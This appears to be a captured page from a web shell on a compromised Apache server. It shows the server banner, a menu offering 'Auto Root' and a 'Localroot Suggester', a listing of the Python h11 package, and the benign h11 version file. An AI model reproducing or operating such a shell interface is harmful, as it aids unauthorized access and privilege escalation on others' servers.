Linux tsuru-no-tsurugi 5.15.0-186-generic #196-Ubuntu SMP Sat Jun 20 16:09:34 UTC 2026 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.0.18 & Your IP : 216.73.216.68
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
lib /
python3 /
dist-packages /
h11 /
Delete
Unzip
Name
Size
Permission
Date
Action
__pycache__
[ DIR ]
drwxr-xr-x
2024-08-30 00:22
tests
[ DIR ]
drwxr-xr-x
2024-08-30 00:22
__init__.py
1.47
KB
-rw-r--r--
2022-01-20 05:32
_abnf.py
4.53
KB
-rw-r--r--
2022-01-20 05:32
_connection.py
25.86
KB
-rw-r--r--
2022-01-20 05:32
_events.py
11.54
KB
-rw-r--r--
2022-01-20 05:32
_headers.py
9.99
KB
-rw-r--r--
2022-01-20 05:32
_readers.py
8.17
KB
-rw-r--r--
2022-01-20 05:32
_receivebuffer.py
5.13
KB
-rw-r--r--
2022-01-20 05:32
_state.py
12.88
KB
-rw-r--r--
2022-01-20 05:32
_util.py
4.77
KB
-rw-r--r--
2022-01-20 05:32
_version.py
686
B
-rw-r--r--
2022-01-20 05:32
_writers.py
4.94
KB
-rw-r--r--
2022-01-20 05:32
py.typed
7
B
-rw-r--r--
2022-01-20 05:32
Save
Rename
# This file must be kept very simple, because it is consumed from several # places -- it is imported by h11/__init__.py, execfile'd by setup.py, etc. # We use a simple scheme: # 1.0.0 -> 1.0.0+dev -> 1.1.0 -> 1.1.0+dev # where the +dev versions are never released into the wild, they're just what # we stick into the VCS in between releases. # # This is compatible with PEP 440: # http://legacy.python.org/dev/peps/pep-0440/ # via the use of the "local suffix" "+dev", which is disallowed on index # servers and causes 1.0.0+dev to sort after plain 1.0.0, which is what we # want. (Contrast with the special suffix 1.0.0.dev, which sorts *before* # 1.0.0.) __version__ = "0.13.0"